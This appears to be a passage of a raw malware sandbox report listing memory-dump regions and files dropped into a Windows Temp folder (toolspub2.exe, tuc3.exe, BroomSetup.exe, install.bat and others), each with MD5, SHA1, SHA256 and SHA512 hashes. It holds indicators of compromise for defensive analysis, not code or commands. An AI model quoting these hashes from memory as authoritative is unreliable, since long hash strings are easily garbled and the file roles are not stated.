memory/1608-29-0x0000000005FC0000-0x000000000605C000-memory.dmp
memory/1832-28-0x00000000067C0000-0x0000000006DD8000-memory.dmp
memory/1608-32-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1832-31-0x00000000066A0000-0x00000000067AA000-memory.dmp
memory/1832-33-0x00000000065C0000-0x00000000065D2000-memory.dmp
memory/1832-34-0x0000000006620000-0x000000000665C000-memory.dmp
memory/1832-35-0x00000000080C0000-0x000000000810C000-memory.dmp
memory/1832-36-0x0000000008C50000-0x0000000008CB6000-memory.dmp
memory/1832-37-0x0000000009090000-0x00000000090E0000-memory.dmp
memory/1608-38-0x0000000006840000-0x0000000006A08000-memory.dmp
memory/1608-39-0x0000000007C40000-0x0000000007DD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll
| MD5 | 544cd51a596619b78e9b54b70088307d |
| SHA1 | 4769ddd2dbc1dc44b758964ed0bd231b85880b65 |
| SHA256 | dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd |
| SHA512 | f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719 |
memory/1608-45-0x0000000005FA0000-0x0000000005FB0000-memory.dmp
memory/1608-46-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-47-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-48-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-50-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-49-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-52-0x00000000083A0000-0x00000000084A0000-memory.dmp
memory/1608-53-0x00000000083A0000-0x00000000084A0000-memory.dmp
memory/1608-51-0x0000000005D00000-0x0000000005D10000-memory.dmp
memory/1608-55-0x00000000083A0000-0x00000000084A0000-memory.dmp
memory/1356-54-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1832-58-0x00000000094B0000-0x0000000009672000-memory.dmp
memory/1832-57-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1356-59-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1832-60-0x0000000009BB0000-0x000000000A0DC000-memory.dmp
memory/1832-62-0x0000000005110000-0x0000000005120000-memory.dmp
memory/1608-63-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1356-64-0x0000000004E90000-0x0000000004EA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4071.exe
| MD5 | 54226b2db6b4ef852164ef8b69426a6c |
| SHA1 | a1c36dd7cfedbfe86c07fe260d71eefa2d591afc |
| SHA256 | b2d8928ba610dbfd4f652c6899ab552251629af0d210fa43efc7b04f5471f1c2 |
| SHA512 | f8a51ec93b04d0454b5123195c58b880ef79b242171d3694393ec982feb257b7d7644a92cbe854b37fc7265f0f3868fe1d05619f109866fa13272339c7c28aab |
C:\Users\Admin\AppData\Local\Temp\4071.exe
| MD5 | 4b86d5128a5ae0104c07fdc960a220c1 |
| SHA1 | 1a18a3ea1ff82f450f5987cd542de472ee47e8e9 |
| SHA256 | 7c95d92c932dc5f68fce72bc91bd10af80e20b7a0f99c1fdecd303694ca62c05 |
| SHA512 | 4c7818627141f1593ccc7f9735e0511b3ed8b5bc359e2cbf34b151c32d19ec277e81c61cae84d38596a87bec12e18e7c89ac981b557b94b4cdd3706d35c1f7a7 |
memory/1504-68-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1504-69-0x0000000000D00000-0x0000000001AF2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | fd3967790f9b00f107ad32b2918330a0 |
| SHA1 | da44a0403f61da1946c9f6a8aac8a7b5fb4a393b |
| SHA256 | 0c3a6022d16181647d51aa0a3a940887598afeeb0f6b2bba8eb4eaccd6c78a38 |
| SHA512 | b0db15140dc3e0e83acbfa671dd8708ff9309b54e58446b73ae109853f118df47fbd8d7e82ab3e84ace4743501bed6e8dc001f2890c1e5f98cdb0cefbeed5f3a |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | c6c53c63657293e4da62c4e7f1d1831b |
| SHA1 | a8379d445fb2226da97418f4d75bad07ef9290ca |
| SHA256 | 900c0640ba1e682128403dd48d4865aa07f3a63086c7e19bc8baa0ca79bd6cdf |
| SHA512 | 9033f375fa453f04734b22837f08d50b7c01156fce8cfc1536921afc8014015753e48280d266d8e71a5bb3b0a79572cdb82b08c921149d797c7494418ff85965 |
C:\Users\Admin\AppData\Local\Temp\4CB7.exe
| MD5 | dc6fbf2cd9ad1f1f0ac200e9bec7ea3f |
| SHA1 | c3af9d82d270829784339331dea63f927400e0d4 |
| SHA256 | 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590 |
| SHA512 | 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 62b01ec4a955eab3a7a41e2c07f18913 |
| SHA1 | 48d8e1e391fa078d78e2130481f9d35eb45a11ec |
| SHA256 | c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56 |
| SHA512 | 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat
| MD5 | 60c9624e093baac4bef11ab4fc846111 |
| SHA1 | 07a25911c81e04608a0dc6fb065524a9da82dd65 |
| SHA256 | e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d |
| SHA512 | 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24 |
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | ba3c9a8bb110eab47d50289bb5b2649e |
| SHA1 | 712ac41a981c905d2e196e09de6c5b07aecf817d |
| SHA256 | e75c74dea2242ec3ef269f3c1ecbb11e3596e8aa7f3f6f0103f6764248403729 |
| SHA512 | 59712293eb0c55a1988bfc64668e7552a0ec128da9361cb5665c936cb754ae9d1fe55f4a33a395ee7dcf205988fb0e0f17b00007b1283aa92c25895aa061efcf |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 92fd3981a506dfbb1693fc0b7408178f |
| SHA1 | 36ac4436c87a418f4d4a1ec0ef894bcfa9c9fffd |
| SHA256 | 8993a7cc631b326a6f4f0c7b69ea7ecb59a3687ae3ee458a3dab21f680cdb756 |
| SHA512 | 94a08867275ea41a610acfb8a62c6521b4b498e42100f3d2083229658939bf00a5136cfa6dc47d090dbd82756411dc47374cbe23c6204062120bb1c15e299704 |
C:\Users\Admin\AppData\Local\Temp\nsd589C.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | cbac498919a9c98b2eb0275337292117 |
| SHA1 | cc922e05683632b1545d46413fc16f1987e83272 |
| SHA256 | 869874cb38b537f1f78c300726923208fa9dfd4ebbd2e34aa43c6c784bf63e51 |
| SHA512 | 7b0c353ebe187b5891b15a2baeb1a3a7dfc2b5ef1bcb00124a57b1b8d90859e40e40e80c71a6636b85069b4cfd43d144e453cdae22babb891b09a0da138de4c4 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | f13a7efa3ff667b3c48772966ad11f90 |
| SHA1 | b764e17683fbb95de8f93d030b7372f3276f76b8 |
| SHA256 | 2f83ad42a1f0f0f360423e24029a29a58a4289d016e32cc28cc186ec9abb764e |
| SHA512 | 7def7d78d7421ace9c04e718faeca1a520fb3cc34b4b072477a9d354a606a69c74fc3681ca44fbed6e5184e1aeec4e8094d3684ad8fde0a696698c85266b1250 |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 442d527f5a1fbb69048d287300832509 |
| SHA1 | 595d5a1496c5ee16b0a86a81908394d342515fb5 |
| SHA256 | dfdf8791420306ac13e642edf65f09cbbc70817a6f8532cd056bc24068100c79 |
| SHA512 | 6e95912897814692ad234e52f8beafe150af22648cd68d7ca933cfe8411e83aa50f4643f7bb4f4fe415df3b422bfd942120b16a527d723c4f12159116b8684ad |
C:\Users\Admin\AppData\Local\Temp\nsd589C.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
memory/1704-126-0x0000000000990000-0x0000000000999000-memory.dmp
memory/1504-130-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1132-132-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1132-128-0x0000000000400000-0x0000000000409000-memory.dmp
memory/4372-127-0x0000000000400000-0x0000000000418000-memory.dmp
memory/1704-125-0x0000000000A00000-0x0000000000B00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 134a8d26b1a4d45ddc81bf78dad8bfc8 |
| SHA1 | 7494cdcaedf79868d5c60e1d27de594f00ca6afe |
| SHA256 | 1d105f8ea1def43bbdd9b146f871312b8d7e07c8a04d7f8762da3f4d347e0f48 |
| SHA512 | 7ced5f5513b6a7f5d685f604378ee4e725903dc62a5f3149ae92140acd7aeaa4fdf57491a54d400054449e63fe754f7649a7dc9e9cb080c9a87300ac523bc22b |
C:\Users\Admin\AppData\Local\Temp\is-E9HMQ.tmp\tuc3.tmp
| MD5 | f448d7f4b76e5c9c3a4eaff16a8b9b73 |
| SHA1 | 31808f1ffa84c954376975b7cdb0007e6b762488 |
| SHA256 | 7233b85eb0f8b3aa5cae3811d727aa8742fec4d1091c120a0fe15006f424cc49 |
| SHA512 | f8197458cd2764c0b852dac34f9bf361110a7dc86903024a97c7bcd3f77b148342bf45e3c2b60f6af8198ae3b83938dbaad5e007d71a0f88006f3a0618cf36f4 |
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | cebb587a4ae00a76e325a152c72d4e75 |
| SHA1 | ecd669d5cbb36bdc1603c874389affd575568a8e |
| SHA256 | 0051ece33b859b57790852bd73ebdeee32af04e3ebe024bf32e2209893f3134b |
| SHA512 | cb9ad2d2fc416ef85f10a36401c1a1a31d71ca7a73e4385326f9f6a5ff7acc0a646b819b242b46b24f006597872e1f1b8d9305e4005b105d2889f42e4fde009e |
C:\Users\Admin\AppData\Local\Temp\is-IQN02.tmp\_isetup\_isdecmp.dll
| MD5 | 3adaa386b671c2df3bae5b39dc093008 |
| SHA1 | 067cf95fbdb922d81db58432c46930f86d23dded |
| SHA256 | 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38 |
| SHA512 | bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303 |
C:\Users\Admin\AppData\Local\Temp\is-IQN02.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/1032-152-0x00007FFD8D690000-0x00007FFD8E151000-memory.dmp
memory/1032-153-0x0000027C4F6C0000-0x0000027C4F6D0000-memory.dmp
memory/1032-154-0x0000027C4F6C0000-0x0000027C4F6D0000-memory.dmp
memory/1872-155-0x0000000002200000-0x0000000002201000-memory.dmp
memory/1032-157-0x0000027C4F730000-0x0000027C4F752000-memory.dmp
memory/1936-166-0x0000000000B40000-0x0000000000B41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wa0cdmpw.nvb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4292-167-0x0000000002980000-0x0000000002D84000-memory.dmp
memory/4292-168-0x0000000002E90000-0x000000000377B000-memory.dmp
memory/1032-169-0x0000027C4F6C0000-0x0000027C4F6D0000-memory.dmp
memory/4292-170-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/3552-171-0x0000000002940000-0x0000000002956000-memory.dmp
memory/1132-172-0x0000000000400000-0x0000000000409000-memory.dmp
memory/1356-234-0x0000000075180000-0x0000000075930000-memory.dmp
memory/1832-239-0x0000000005110000-0x0000000005120000-memory.dmp